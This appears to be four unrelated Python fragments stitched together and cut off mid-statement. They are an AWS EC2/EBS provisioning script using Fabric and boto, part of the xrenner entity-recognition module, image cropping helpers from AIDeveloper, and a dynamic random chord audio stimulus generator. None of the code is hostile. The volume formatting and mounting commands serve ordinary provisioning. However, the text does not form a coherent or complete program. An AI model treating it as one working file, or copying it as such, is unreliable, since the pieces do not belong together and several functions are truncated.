def attach_ebs(cluster,n=None,size=50,device='sdy',volume_type=None,iops=None):
"""
Attaches a new EBS volume to an instance in an existing cluster.
"""
ec2 = _provider_api(cluster)
ebsSizeInGb = int(size)
hosts = _cluster_hosts(ec2, cluster)
if n is not None:
onlyOne = []
onlyOne.append(hosts[int(n)])
hosts = onlyOne
for instanceHost in hosts:
# copy the tags over from the instance to the ebs vol
tagsOnInstance = {}
instanceId = None
az = None
byTag = ec2.get_all_instances(filters={'tag:' + CLUSTER_TAG:cluster})
for rsrv in byTag:
for inst in rsrv.instances:
if (inst.public_dns_name == instanceHost or inst.private_ip_address == instanceHost):
tagsOnInstance = inst.__dict__['tags']
instanceId = inst.id
az = inst.placement
break
if instanceId is None or az is None:
_fatal("Can't find instance ID / availability zone for instance "+instanceHost+" in cluster: "+cluster)
vol = ec2.create_volume(ebsSizeInGb, az, volume_type=volume_type, iops=iops)
_info('Created new EBS volume '+vol.id+' in AZ '+az)
time.sleep(5)
volStatus = "unknown"
maxTime = 180
totalTime = 0
while volStatus != "available" and totalTime < maxTime:
curr_vol = ec2.get_all_volumes([vol.id])[0]
volStatus = curr_vol.status
_status('New EBS volume for '+instanceId+' in '+curr_vol.zone+' is '+volStatus)
if volStatus != "available":
time.sleep(10)
totalTime += 10
if volStatus != "available":
_fatal('Failed to see new EBS volume become available in %d seconds!' % maxTime)
time.sleep(2)
_status('New EBS volume created, tagging it ...')
tagsOnInstance['Name'] = tagsOnInstance['Name']+'_vol0'
tagsOnInstance.pop('numInstanceStores', None)
ec2.create_tags([vol.id], tagsOnInstance)
result = ec2.attach_volume (vol.id, instanceId, "/dev/"+device)
_status('Attach EBS vol %s to instance %s returned status: %s' % (vol.id, instanceId, result))
time.sleep(5)
attachStatus = "unknown"
deviceId = "?"
totalTime = 0
while attachStatus != "attached" and totalTime < maxTime:
curr_vol = ec2.get_all_volumes([vol.id])[0]
attachStatus = curr_vol.attach_data.status
deviceId = curr_vol.attach_data.device
_status('Attached EBS vol %s to instance %s has status: %s' % (vol.id, instanceId, attachStatus))
if attachStatus != "attached":
time.sleep(10)
totalTime += 10
if attachStatus != "attached":
_fatal('Failed to attach new EBS vol %s to instance %s within %d seconds!' % (vol.id, instanceId, maxTime))
_info('Successfully attached new EBS vol %s to instance %s at device %s ... mounting at /vol0' % (vol.id, instanceId, deviceId))
v = 0
xdevs = ['xv'+device[1:]]
with settings(host_string=instanceHost):
sudo('mkfs -F -t ext4 /dev/%s || true' % xdevs[v])
sudo('mkdir /vol%d' % v)
sudo('echo "/dev/%s /vol%d ext4 defaults 0 2" >> /etc/fstab' % (xdevs[v], v))
sudo('mount /vol%d' % v)
# grant ownership to our ssh user
sudo('chown -R %s: /vol%d' % (ssh_user, v))
ec2.close()
# -----------------------------------------------------------------------------
# Fabric actions begin here ... anything above this are private helper methods.
# -----------------------------------------------------------------------------
def new_ec2_instances(cluster,
n=1,
maxWait=180,
instance_type=None,
ami=None,
key=None,
az=None,
placement_group=None,
skipStores=None,
purpose=None,
project=None,
vpcSubnetId=None,
vpcSecurityGroupId=None,
customTags='{"CostCenter":"eng"}',
rootEbsVolSize=None,
mntEbsVolSize=None):
"""
Launches one or more instances in EC2; each instance is tagged with a cluster id and username.
SSH connectivity to each instance is verified before this command returns with a maximum wait
of 3 minutes.
Example:
Provision 4 instances tagged with the cluster ID "cloud1": fab new_ec2_instances:cloud1,n=4
Arg Usage:
cluster: A short but informative identifier for the cluster you are launching.
n (int, optional): Number of instances to launch; running this command will cost at least
the per hour instance price * n, so be careful.
maxWait (int, optional): Maximum number of seconds to wait for the instances to be online;
default is 180 seconds.
instance_type (optional): Amazon EC2 instance instance_type, default is r3.large
ami (optional): AMI ID, defaults to using the config value for AWS_HVM_AMI_ID in ~/.sstk
key (optional): SSH key pair name, | |
#!/usr/bin/python
# -*- coding: utf-8 -*-
import re
from collections import defaultdict, OrderedDict
from .xrenner_classes import Markable
from six import iteritems, iterkeys
"""
Marker module for markable entity recognition. Establishes compatibility between entity features
and determines markable extension in tokens
Author: <NAME>
"""
def is_atomic(mark, atoms, lex):
"""
Checks if nested markables are allowed within this markable
:param mark: the :class:`.Markable` to be checked for atomicity
:param atoms: list of atomic markable text strings
:param lex: the :class:`.LexData` object with gazetteer information and model settings
:return: bool
"""
marktext = mark.text.strip()
# Do not accept a markable [New] within atomic [New Zealand]
if marktext in atoms:
return True
elif marktext.lower() in atoms:
return True
# Remove possible prefix tokens to reject [The [United] Kingdom] if [United Kingdom] in atoms
elif remove_prefix_tokens(marktext, lex).strip() in atoms:
return True
# Remove possible suffix tokens to reject [[New] Zealand 's] is [New Zealand] in atoms
elif remove_suffix_tokens(marktext, lex).strip() in atoms:
return True
elif remove_infix_tokens(marktext, lex).strip() in atoms:
return True
# Combination of prefix and suffix to reject [The [United] Kingdom 's]
elif mark.core_text in atoms:
return True
elif replace_head_with_lemma(mark) in atoms:
return True
# Dynamic generation of proper name pattern
elif 0 < marktext.strip().count(" ") < 3 and marktext.strip().split(" ")[0] in lex.first_names and marktext.strip().split(" ")[-1] in lex.last_names:
return True
else:
non_essential_modifiers = list(mod.text for mod in mark.head.modifiers if lex.filters["non_essential_mod_func"].match(mod.func))
if len(non_essential_modifiers) > 0:
mark_unmod_text = mark.core_text
for mod in non_essential_modifiers:
mark_unmod_text = mark_unmod_text.replace(mod+" ","")
if mark_unmod_text in lex.atoms:
return True
# Not an atom, nested markables allowed
return False
def remove_suffix_tokens(marktext, lex):
"""
Remove trailing tokens such as genitive 's and other tokens configured as potentially redundant to citation form
:param marktext: the markable text string to remove tokens from
:param lex: the :class:`.LexData` object with gazetteer information and model settings
:return: potentially truncated text
"""
if lex.filters["core_suffixes"].search(marktext):
return lex.filters["core_suffixes"].sub(" ", marktext)
else:
tokens = marktext.split(" ")
suffix_candidate = ""
for token in reversed(tokens):
suffix_candidate = token + " " + suffix_candidate
if suffix_candidate.strip() in lex.affix_tokens:
if lex.affix_tokens[suffix_candidate.strip()] == "prefix":
return re.sub(suffix_candidate + r'$', "", marktext)
return marktext
def remove_prefix_tokens(marktext, lex):
"""
Remove leading tokens such as articles and other tokens configured as potentially redundant to citation form
:param marktext: the markable text string to remove tokens from
:param lex: the :class:`.LexData` object with gazetteer information and model settings
:return: potentially truncated text
"""
if lex.filters["core_prefixes"].match(marktext): # NB use initial match here
return lex.filters["core_prefixes"].sub(" ", marktext)
else:
tokens = marktext.split(" ")
prefix_candidate = ""
for token in tokens:
prefix_candidate += token + " "
if prefix_candidate.strip() in lex.affix_tokens:
if lex.affix_tokens[prefix_candidate.strip()] == "prefix":
return re.sub(r'^' + prefix_candidate, "", marktext)
return marktext
def remove_infix_tokens(marktext, lex):
"""
Remove infix tokens such as dashes, interfixed articles (in Semitic construct state) etc.
:param marktext: the markable text string to remove tokens from
:param lex: the :class:`.LexData` object with gazetteer information and model settings
:return: potentially truncated text
"""
return lex.filters["core_infixes"].sub(" ", marktext)
def resolve_mark_entity(mark, lex):
"""
Main function to set entity type based on progressively less restricted parts of a markable's text
:param mark: The :class:`.Markable` object to get the entity type for
:param lex: the :class:`.LexData` object with gazetteer information and model settings
:return: void
"""
entity = ""
use_entity_deps = True
use_entity_sims = True
use_sequencer = True if lex.sequencer is not None else False
if "ablations" in lex.debug:
if "no_entity_dep" in lex.debug["ablations"]:
use_entity_deps = False
if "no_entity_sim" in lex.debug["ablations"]:
use_entity_sims= False
if "no_sequencer" in lex.debug["ablations"]:
use_sequencer = False
## DEBUG POINT ##
if mark.text == lex.debug["ana"] or mark.head.text == lex.debug["ana"]:
a=5
parent_text = mark.head.head_text
if mark.form == "pronoun":
if re.search(r'[12]',mark.agree): # Explicit 1st or 2nd person pronoun
entity = lex.filters["person_def_entity"]
mark.entity_certainty = 'certain'
elif mark.agree == "male" or mark.agree == "female": # Possibly human 3rd person
entity = lex.filters["person_def_entity"]
mark.entity_certainty = 'uncertain'
else:
if use_sequencer:
pred, score = mark.head.seq_pred
if pred != "O":
entity = pred
mark.entity_certainty = 'sequencer'
if use_entity_deps and entity == "":
if parent_text in lex.entity_deps:
if mark.head.func in lex.entity_deps[parent_text][mark.head.func]:
dep_ents = dict(lex.entity_deps[parent_text][mark.head.func])
if lex.filters["no_person_agree"].match(mark.agree) is not None and lex.filters["person_def_entity"] in dep_ents:
del dep_ents[lex.filters["person_def_entity"]]
if len(dep_ents) > 0:
entity = max(iterkeys(dep_ents), key=(lambda key: dep_ents[key]))
if entity == "": # No literal match for dependency, fall back to similar heads
if parent_text in lex.similar and use_entity_sims:
similar_heads = lex.similar[parent_text]
for similar_head in similar_heads:
if similar_head in lex.entity_deps:
if mark.head.func in lex.entity_deps[similar_head]:
if lex.filters["no_person_agree"].match(mark.agree) is not None:
similar_dict = {}
for key, value in lex.entity_deps[similar_head][mark.head.func].items():
if key != lex.filters["person_def_entity"]:
similar_dict[key] = value
else:
similar_dict = lex.entity_deps[similar_head][mark.head.func]
if len(similar_dict) > 0:
entity = max(similar_dict,
key=(lambda key: similar_dict[key]))
break
if entity == "": # Entity dependency information not used; no way to guess entity
entity = lex.filters["default_entity"]
mark.entity_certainty = "uncertain"
else:
if mark.coordinate:
# For coordinate markables we expect the constituents to determine the entity in assign_coordinate_entity.
# An exception to this is when the entire coordination is listed in the entities list.
if entity == "":
entity = resolve_entity_cascade(mark.text, mark, lex)
if entity == "":
entity = resolve_entity_cascade(mark.core_text, mark, lex)
else:
if entity == "":
# Try to catch year numbers and hours + minutes
if re.match(r'^(1[456789][0-9][0-9]|20[0-9][0-9]|(2[0-3]|1?[0-9]):[0-5][0-9]|ה?תש.".)$', mark.head.text) is not None:
entity = lex.filters["time_def_entity"]
mark.entity_certainty = "uncertain"
mark.subclass = "time-unit" # TODO: de-hardwire this
mark.definiteness = "def" # literal year numbers are considered definite like 'proper names'
mark.form = "proper" # literal year numbers are considered definite like 'proper names'
if entity == "":
if re.match(r'^(([0-9]+[.,]?)+)$', mark.core_text) is not None:
entity = lex.filters["quantity_def_entity"]
mark.alt_entities.append(lex.filters["time_def_entity"])
mark.entity_certainty = "uncertain"
if entity == "":
entity = resolve_entity_cascade(mark.text, mark, lex)
if entity == "":
entity = resolve_entity_cascade(replace_head_with_lemma(mark), mark, lex)
if entity == "":
entity = resolve_entity_cascade(remove_suffix_tokens(mark.text.strip(),lex), mark, lex)
if entity == "":
entity = resolve_entity_cascade(remove_prefix_tokens(mark.text.strip(), lex), mark, lex)
if entity == "" and mark.core_text != mark.text:
entity = resolve_entity_cascade(mark.core_text, mark, lex)
if entity == "":
entity = recognize_entity_by_mod(mark, lex)
if entity == "" and mark.head.text.istitle():
if mark.head.text in lex.last_names:
modifiers_match_article = (lex.filters["articles"].match(mod.text) is not None for mod in mark.head.modifiers)
modifiers_match_first_name = (mod.text in lex.first_names for mod in mark.head.modifiers)
if any(modifiers_match_first_name) and not any(modifiers_match_article):
entity = lex.filters["person_def_entity"]
if entity == "" and mark.head.text.istitle():
entity = resolve_entity_cascade(mark.core_text.lower(), mark, lex)
if entity == "" and not mark.head.text.istitle():
entity = resolve_entity_cascade(mark.core_text[:1].upper() + mark.core_text[1:], mark, lex)
if entity == "":
entity = resolve_entity_cascade(mark.head.text, mark, lex)
if entity == "" and mark.head.text.istitle():
entity = resolve_entity_cascade(mark.head.text.lower(), mark, lex)
if entity == "" and mark.head.text.isupper():
entity = resolve_entity_cascade(mark.head.text.lower(), mark, lex)
if entity == "" and mark.head.text.isupper():
entity = resolve_entity_cascade(mark.head.text.lower().title(), mark, lex)
if entity == "" and not mark.head.lemma == mark.head.text: # Try lemma match if lemma different from token
entity = resolve_entity_cascade(mark.head.lemma, mark, lex)
if entity == "":
if (mark.head.text.istitle() or not lex.filters["cap_names"]):
if mark.head.text in lex.last_names or mark.head.text in lex.first_names:
modifiers_match_definite = (lex.filters["definite_articles"].match(mod.text) is not None for mod in mark.head.modifiers)
modifiers_match_article = (lex.filters["articles"].match(mod.text) is not None for mod in mark.head.modifiers)
modifiers_match_def_entity = (re.sub(r"\t.*","",lex.entity_heads[mod.text.strip().lower()][0]) == lex.filters["default_entity"] for mod in mark.head.modifiers if mod.text.strip().lower() in lex.entity_heads)
if not (any(modifiers_match_article) or any(modifiers_match_definite) or any(modifiers_match_def_entity)):
entity = lex.filters["person_def_entity"]
if entity == "":
# Just use sequencer if desired
if use_sequencer:
pred, score = mark.head.seq_pred
if pred != "O":
entity = pred
mark.entity_certainty = 'sequencer'
if entity == "":
# See what the affix morphology predicts for the head
head_text = mark.lemma if mark.lemma != "_" and mark.lemma != "" else mark.head.text
morph_probs = get_entity_by_affix(head_text,lex)
# Now check what the dependencies predict
dep_probs = {}
if use_entity_deps:
if parent_text in lex.entity_deps:
if mark.head.func in lex.entity_deps[parent_text]:
dep_probs.update(lex.entity_deps[parent_text][mark.head.func])
if len(dep_probs) == 0: # No literal dependency information found, check if similar heads are known
if parent_text in lex.similar:
similar_heads = lex.similar[parent_text]
for similar_head in similar_heads:
if similar_head in lex.entity_deps:
if mark.head.func in lex.entity_deps[similar_head]:
dep_probs.update(lex.entity_deps[similar_head][mark.head.func])
break
# And check what entity similar words are
sim_probs = {}
if use_entity_sims:
if mark.head.text in lex.similar:
for similar_word in lex.similar[mark.head.text]:
if similar_word in lex.entity_heads:
for entity_type in lex.entity_heads[similar_word]:
entity_string = entity_type.split("\t")[0]
if entity_string in sim_probs:
sim_probs[entity_string] += 1
else:
sim_probs.update({entity_string:1})
# Compare scores to decide between affix vs. dependency evidence vs. embeddings
dep_values = list(dep_probs[key] for key in dep_probs)
total_deps = float(sum(dep_values))
sim_values = list(sim_probs[key] for key in sim_probs)
total_sims = float(sum(sim_values))
norm_dep_probs = {}
norm_sim_probs = {}
# Normalize - each information source hedges its bets based on how many guesses it makes
for key, value in iteritems(dep_probs):
norm_dep_probs[key] = value/total_deps
for key, value in iteritems(sim_probs):
norm_sim_probs[key] = value/total_sims
joint_probs = defaultdict(float)
joint_probs.update(norm_dep_probs)
for entity in morph_probs:
joint_probs[entity] += morph_probs[entity]
for entity in norm_sim_probs:
joint_probs[entity] += sim_probs[entity]
# Bias in favor of default entity to break ties
joint_probs[lex.filters["default_entity"]] += 0.0000001
entity = max(joint_probs, key=(lambda key: joint_probs[key]))
if entity != "":
mark.entity = entity
if "/" in mark.entity: # Lexicalized agreement information appended to entity
if mark.agree == "" or mark.agree is None:
mark.agree = mark.entity.split("/")[1]
elif mark.agree_certainty == "":
mark.alt_agree.append(mark.agree)
mark.agree = mark.entity.split("/")[1]
mark.entity = mark.entity.split("/")[0]
elif mark.entity == lex.filters["person_def_entity"] and mark.agree == lex.filters["default_agree"] and mark.form != "pronoun":
mark.agree = lex.filters["person_def_agree"]
mark.agree_certainty = "uncertain"
if "\t" in mark.entity: # This is a subclass bearing solution
mark.subclass = mark.entity.split("\t")[1]
mark.entity = mark.entity.split("\t")[0]
if mark.entity == lex.filters["person_def_entity"] and mark.form != "pronoun":
if mark.text in lex.names:
mark.agree = lex.names[mark.text]
if mark.entity == lex.filters["person_def_entity"] and mark.agree is None:
no_affix_mark = remove_suffix_tokens(remove_prefix_tokens(mark.text, lex), lex)
if no_affix_mark in lex.names:
mark.agree = lex.names[no_affix_mark]
if mark.entity == lex.filters["person_def_entity"] and mark.agree is None:
mark.agree = lex.filters["person_def_agree"]
mark.agree_certainty = "uncertain"
if mark.entity == "" and mark.core_text.upper() == mark.core_text and re.search(r"[A-ZÄÖÜ]", mark.core_text) is not None: # Unknown all caps entity, guess acronym default
mark.entity = lex.filters["all_caps_entity"]
mark.entity_certainty = "uncertain"
if mark.entity == "": # Unknown entity, guess default
mark.entity = lex.filters["default_entity"]
mark.entity_certainty = "uncertain"
if mark.subclass == "":
if mark.subclass == "":
mark.subclass = mark.entity
if mark.func == "title":
mark.entity = lex.filters["default_entity"]
if | |
# -*- coding: utf-8 -*-
"""
aid_img
some functions for image processing that are essential for AIDeveloper
---------
@author: maikherbig
"""
import numpy as np
import os, shutil,h5py
import pandas as pd
rand_state = np.random.RandomState(117) #to get the same random number on diff. PCs
import aid_bin
from pyqtgraph.Qt import QtWidgets
from scipy import ndimage
import cv2
import tensorflow as tf
from tensorflow.python.client import device_lib
device_types = device_lib.list_local_devices()
device_types = [device_types[i].device_type for i in range(len(device_types))]
config_gpu = tf.ConfigProto()
if device_types[0]=='GPU':
config_gpu.gpu_options.allow_growth = True
config_gpu.gpu_options.per_process_gpu_memory_fraction = 0.7
dir_root = os.path.dirname(aid_bin.__file__)#ask the module for its origin
def check_squared(images):
if images.shape[1]==images.shape[2]:
return images #everything is fine
else:
print("Image is not yet squared. Crop 1 pixel from the longer side to adjust")
#which is the smaller side?
if images.shape[1]<images.shape[2]: #height is smaller than width
images = images[:,:,0:-1]
elif images.shape[1]>images.shape[2]: #height is smaller than width
images = images[:,0:-1]
print("Final size after correcting: "+str(images.shape))
return images
def gen_crop_img(cropsize,rtdc_path,nr_events=100,replace=True,random_images=True,zoom_factor=1,zoom_order=0,color_mode='Grayscale',padding_mode='constant'):
failed,rtdc_ds = aid_bin.load_rtdc(rtdc_path)
if failed:
msg = QtWidgets.QMessageBox()
msg.setIcon(QtWidgets.QMessageBox.Information)
msg.setText(str(rtdc_ds))
msg.setWindowTitle("Error occurred during loading file")
msg.setStandardButtons(QtWidgets.QMessageBox.Ok)
msg.exec_()
return
pix = rtdc_ds.config["imaging"]["pixel size"] #get pixelation (um/pix)
images_shape = rtdc_ds["image"].shape #get shape of the images (nr.images,height,width,channels)
images = rtdc_ds["image"] #get the images
if len(images_shape)==4:#Loaded images are RGB
if images_shape[-1]==3:
channels=3
else:
print("Images have "+str(images_shape[-1])+" channels. This is (currently) not supported by AID")
return
if color_mode=='Grayscale':#User want to have Grayscale: use the luminosity formula to convert RGB to gray
print("Used luminosity formula to convert RGB to Grayscale")
images = (0.21 * images[:,:,:,:1]) + (0.72 * images[:,:,:,1:2]) + (0.07 * images[:,:,:,-1:])
images = images[:,:,:,0]
images = images.astype(np.uint8)
channels=1
elif len(images_shape)==3:#Loaded images are Grayscale
channels=1
if color_mode=='RGB':#If the user wants to use RGB, but did only load Grayscale images, simply copy the information to all 3 channels
images = np.stack((images,)*3, axis=-1)
print("Copied information to all three channels to convert Grayscale to RGB")
channels = 3 #Updates the channel-info. After the conversion we now have RGB
#HEIGHT
#Compute, if after zooming, the image would need to be cropped or padded in height
#Difference between the (zoomed) image height and the required final height?
diff_h = int(abs(cropsize-zoom_factor*images_shape[1]))
#Padding or Cropping?
if cropsize > zoom_factor*images_shape[1]: #Cropsize is larger than the image_shape
padding_h = True #if the requested image height is larger than the zoomed in version of the original images, I have to pad
diff_h = int(np.round(abs(cropsize-zoom_factor*images_shape[1])/2.0,0))
print("I will pad in height: "+str(diff_h) + " pixels on each side")
elif cropsize <= zoom_factor*images_shape[1]:
padding_h = False
diff_h = int(np.round(abs(cropsize-zoom_factor*images_shape[1])/2.0,0))
print("I will crop: "+str(diff_h) + " pixels in height")
#WIDTH
#Compute, if after zooming, the image would need to be cropped or padded in width
#Difference between the (zoomed) image width and the required final width?
diff_w = int(abs(cropsize-zoom_factor*images_shape[2]))
#Padding or Cropping?
if cropsize > zoom_factor*images_shape[2]: #Cropsize is larger than the image_shape
padding_w = True #if the requested image height is larger than the zoomed in version of the original images, I have to pad
diff_w = int(np.round(abs(cropsize-zoom_factor*images_shape[2])/2.0,0))
print("I will pad in width: "+str(diff_w) + " pixels on each side")
elif cropsize <= zoom_factor*images_shape[2]:
padding_w = False
diff_w = int(np.round(abs(cropsize-zoom_factor*images_shape[2])/2.0,0))
print("I will crop: "+str(diff_h) + " pixels in width")
pos_x,pos_y = rtdc_ds["pos_x"][:]/pix,rtdc_ds["pos_y"][:]/pix #/pix converts to pixel index
#If there is a zooming to be applied, adjust pos_x and pos_y accordingly
if zoom_factor != 1:
pos_x,pos_y = zoom_factor*pos_x,zoom_factor*pos_y
index = list(range(len(pos_x))) #define an index to track, which cells are used from the file
y1 = np.around(pos_y-cropsize/2.0)
x1 = np.around(pos_x-cropsize/2.0)
y2 = y1+cropsize
x2 = x1+cropsize
if padding_w==False: #If there is no padding in width, means cells that are at the border can be out of frame
#Indices of cells that would fit into the required cropping frame (cells at the end of the image do not fit)
ind = np.where( (x1>=0) & (x2<=zoom_factor*images_shape[2]) & (y1>=0) & (y2<=zoom_factor*images_shape[1]))[0]
if padding_w==True:
ind = range(len(images))
if random_images==True:
print("I'm loading random images (from disk)")
#select a random amount of those cells
if len(ind)<1:
msg = QtWidgets.QMessageBox()
msg.setIcon(QtWidgets.QMessageBox.Information)
msg.setText("Discarded all events because too far at border of image (check zooming/cropping settings!)")
msg.setWindowTitle("Empty dataset!")
msg.setStandardButtons(QtWidgets.QMessageBox.Ok)
msg.exec_()
return
random_ind = rand_state.choice(ind, size=nr_events, replace=replace) #get random indexes, either unique (replace=False) or not unique (replace=True)
random_ind_unique = np.unique(random_ind,return_counts=True)
images_required = images[random_ind_unique[0],:,:] #now we have one copy of each image,but some images are required several times
pos_x,pos_y = pos_x[random_ind_unique[0]],pos_y[random_ind_unique[0]]
index = np.array(index)[random_ind_unique[0]]
images,Pos_x,Pos_y,indices = [],[],[],[] #overwrite images by defining the list images
for i in range(len(random_ind_unique[1])):
for j in range(random_ind_unique[1][i]):
if channels==1:
images.append(ndimage.zoom(images_required[i,:,:], zoom=zoom_factor,order=int(zoom_order)))
elif channels==3:
images.append(ndimage.zoom(images_required[i,:,:], zoom=(zoom_factor,zoom_factor,1),order=int(zoom_order)))
Pos_x.append(pos_x[i])
Pos_y.append(pos_y[i])
indices.append(index[i])
images = np.array(images)
pos_x = np.array(Pos_x)
pos_y = np.array(Pos_y)
index = np.array(indices)
permut = np.random.permutation(images.shape[0])
images = np.take(images,permut,axis=0,out=images) #Shuffle the images
pos_x = np.take(pos_x,permut,axis=0,out=pos_x) #Shuffle pos_x
pos_y = np.take(pos_y,permut,axis=0,out=pos_y) #Shuffle pos_y
index = np.take(index,permut,axis=0,out=index) #Shuffle index
if random_images==False:
print("I'm loading all images (from disk)")
#simply take all available cells
random_ind = ind #Here it is NOT a random index, but the index of all cells that are not too close to the image border
if len(ind)<1:
msg = QtWidgets.QMessageBox()
msg.setIcon(QtWidgets.QMessageBox.Information)
msg.setText("Discarded all events because too far at border of image (check zooming/cropping settings!)")
msg.setWindowTitle("Empty dataset!")
msg.setStandardButtons(QtWidgets.QMessageBox.Ok)
msg.exec_()
return
images = np.array(images)[random_ind]
if channels==1:
images = ndimage.zoom(images, zoom=(1,zoom_factor,zoom_factor),order=int(zoom_order))
elif channels==3:
images = ndimage.zoom(images, zoom=(1,zoom_factor,zoom_factor,1),order=int(zoom_order))
pos_x,pos_y = pos_x[random_ind],pos_y[random_ind]
index = np.array(index)[random_ind] #this is the original index of all used cells
if padding_h==True and padding_w==True:
if channels==1:
images = np.pad(images,pad_width=( (0, 0),(diff_h, diff_h),(diff_w, diff_w) ),mode=padding_mode)
elif channels==3:
images = np.pad(images,pad_width=( (0, 0),(diff_h, diff_h),(diff_w, diff_w),(0, 0) ),mode=padding_mode)
else:
print("Invalid image dimensions: "+str(images.shape))
return
print("Final size:"+str(images.shape)+","+str(np.array(index).shape))
#terminate the function by yielding the result
yield check_squared(images),np.array(index).astype(int)
if padding_h==False and padding_w==False:
#Compute again the x,y locations of the cells (this is fast)
y1 = np.around(pos_y-cropsize/2.0)
x1 = np.around(pos_x-cropsize/2.0)
y2 = y1+cropsize
x2 = x1+cropsize
Images_Cropped = []
for j in range(len(x2)):#crop the images
image_cropped = images[j,int(y1[j]):int(y2[j]),int(x1[j]):int(x2[j])]
#if image_cropped.shape==(cropsize,cropsize):
Images_Cropped.append(image_cropped)
images = np.r_[Images_Cropped]
print("Final size:"+str(images.shape)+","+str(np.array(index).shape))
#terminate the function by yielding the result
yield check_squared(images),np.array(index).astype(int)
if padding_h==True:
if channels==1:
images = np.pad(images,pad_width=( (0, 0),(diff_h, diff_h),(0, 0) ),mode=padding_mode)
elif channels==3:
images = np.pad(images,pad_width=( (0, 0),(diff_h, diff_h),(0, 0),(0, 0) ),mode=padding_mode)
else:
print("Invalid image dimensions: "+str(images.shape))
return
print("Image size after padding heigth :"+str(images.shape)+","+str(np.array(index).shape))
#dont yield here since cropping width could still be required
if padding_w==True:
if channels==1:
images = np.pad(images,pad_width=( (0, 0),(0, 0),(diff_w, diff_w) ),mode=padding_mode)
elif channels==3:
images = np.pad(images,pad_width=( (0, 0),(0, 0),(diff_w, diff_w),(0, 0) ),mode=padding_mode)
else:
print("Invalid image dimensions: "+str(images.shape))
return
print("Image size after padding width :"+str(images.shape)+","+str(np.array(index).shape))
#dont yield here since cropping height could still be required
if padding_h==False:
#Compute again the x,y locations of the cells (this is fast)
y1 = np.around(pos_y-cropsize/2.0)
y2 = y1+cropsize
Images_Cropped = []
for j in range(len(y1)):#crop the images
image_cropped = images[j,int(y1[j]):int(y2[j]),:]
Images_Cropped.append(image_cropped)
images = np.r_[Images_Cropped]
print("Image size after cropping height:"+str(images.shape)+","+str(np.array(index).shape))
if padding_w==False:
#Compute again the x,y locations of the cells (this is fast)
x1 = np.around(pos_x-cropsize/2.0)
x2 = x1+cropsize
Images_Cropped = []
for j in range(len(x2)):#crop the images
image_cropped = images[j,:,int(x1[j]):int(x2[j])]
Images_Cropped.append(image_cropped)
images = np.r_[Images_Cropped]
print("Image size after cropping width:"+str(images.shape)+","+str(np.array(index).shape))
print("Final size:"+str(images.shape)+","+str(np.array(index).shape))
yield check_squared(images),np.array(index).astype(int)
def gen_crop_img_ram(dic,rtdc_path,nr_events=100,replace=True,random_images=True):
Rtdc_path = dic["rtdc_path"]
ind = np.where(np.array(Rtdc_path)==rtdc_path)[0]
images = np.array(dic["Cropped_Images"])[ind][0]
indices = np.array(dic["Indices"])[ind][0]
ind = range(len(images))
if random_images==True:
#select a random amount of those cells
random_ind = rand_state.choice(ind, size=nr_events, replace=replace) #get random indexes, either unique (replace=False) or not unique (replace=True)
random_ind_unique = np.unique(random_ind,return_counts=True)
images_required = images[random_ind_unique[0],:,:] #now we have one copy of each image,but some images are required several times
indices_required = indices[random_ind_unique[0]]
images,indices = [],[]
for i in range(len(random_ind_unique[1])):
for j in range(random_ind_unique[1][i]):
images.append(images_required[i,:,:])
indices.append(indices_required[i])
images = np.array(images)
indices = np.array(indices)
permut = np.random.permutation(images.shape[0])
images = np.take(images,permut,axis=0,out=images) #Shuffle the images
indices = np.take(indices,permut,axis=0,out=indices) #Shuffle the images
if random_images==False:
#simply take all available cells
random_ind = ind
images = images
indices = indices
yield images,np.array(indices).astype(int)
def contrast_augm_numpy(images,fmin,fmax):
for i in range(images.shape[0]):
fac = np.random.uniform(low=fmin,high=fmax) #plus minus | |
<NAME>., & <NAME>. (1998). Optimizing sound features for cortical neurons. Science, 280(5368), 1439-1444.
<NAME>., <NAME>., <NAME>., <NAME>., & <NAME>. (2003). Spectrotemporal structure of receptive fields in areas AI and AAF of mouse auditory cortex. Journal of neurophysiology, 90(4), 2660-2675.
'''
# Hard code a couple args
pip_ramp_time = 0.005
n_bins_oct = 12 # frequency bins per oct
n_bins_time = int( np.floor( dur / pip_dur ) )
n_oct = np.log2( f2/f1 )
n_bins_freq = int( np.floor( n_oct * n_bins_oct ) )
# Store stim values in matrix format
stim_matrix = np.zeros( ( n_bins_freq, n_bins_time ), dtype=np.float64 )
stim_matrix[:,:] = -np.inf
axis_time = np.arange( 0, dur, pip_dur )
axis_freq = f1 * 2 ** ( np.linspace( 0, np.log2( f2/f1 ), n_bins_freq ) )
y = np.zeros( int(fs*dur), dtype=np.float64 )
n_pips = int( np.floor( n_oct * pip_density ) )
n_pip_samples = int( pip_dur * fs )
for ii in range(n_bins_time):
freqs = np.random.choice( n_bins_freq, n_pips, replace=False ) # select frequencies to generate for time step
y0 = np.zeros( int(fs*pip_dur ), dtype=np.float64 )
for jj in range(freqs.size):
# Define tone frequency and attenuation
freq = axis_freq[ freqs[jj] ]
if isinstance(pip_atten, int):
atten = pip_atten
elif len( pip_atten ) == 1:
atten = pip_atten
else:
atten = pip_atten[ np.random.choice( len(pip_atten), 1 )[0] ]
# Generate tone and add to chord
y1 = gen_tone( fs, pip_dur, freq, atten )
y1 = audio_ramp( y1, fs, pip_ramp_time )
y0 += y1
stim_matrix[ freqs[jj], ii ] = atten
y[ n_pip_samples * ii: n_pip_samples * (ii+1) ] = y0 / n_pips
if opt_plot:
fig, ax = plt.subplots()
im = ax.imshow( stim_matrix, cmap='RdBu', origin='lower', aspect='auto', extent=[ min(axis_time),max(axis_time), min(axis_freq),max(axis_freq) ] )
fig.colorbar(im, ax=ax)
plt.xlabel('Time (s)')
plt.ylabel('Frequency (Hz)')
return y, stim_matrix, axis_time, axis_freq
def gen_dynamic_random_chord_binaural( fs, dur, f1, f2, pip_dur, pip_atten, pip_density, p_left, opt_plot=False ):
'''
Generate dynamic random chord, binaural (audio waveform)
Similar to gen_dynamic_random_chord, except with an additional input arg specifying the proportion of tone pips presented through left and right channels.
INPUT -------
fs : audio sample rate, e.g., 48e3
dur : duration (s)
f1 : low frequency (Hz)
f2 : high frequency (Hz), should not exceed fs/2
pip_dur : duration of individual tone pips (s)
pip_atten : attenuation of individual tone pips (dB), may be integer for constant level or list for variable random level within range
pip_density : pips/oct. Typical values 2-6, must be <= 12
p_left : proportion tone pips presented through left channel, 1 == all left, 0.5 equal left/right, 0 = all right
opt_plot : true/false for stim_matrix plot
RETURN -------
y : audio signal (sound pressure waveform)
stim_matrix : stimulus matrix indicating attenuation levels for each time-frequency bin
axis_time : time axis for stim matrix (s)
axis_freq : frequency axis for stim matrix (Hz)
Example 1:
fs = 48e3
dur = 3
f1 = 200.
f2 = 3200
pip_dur = 0.05
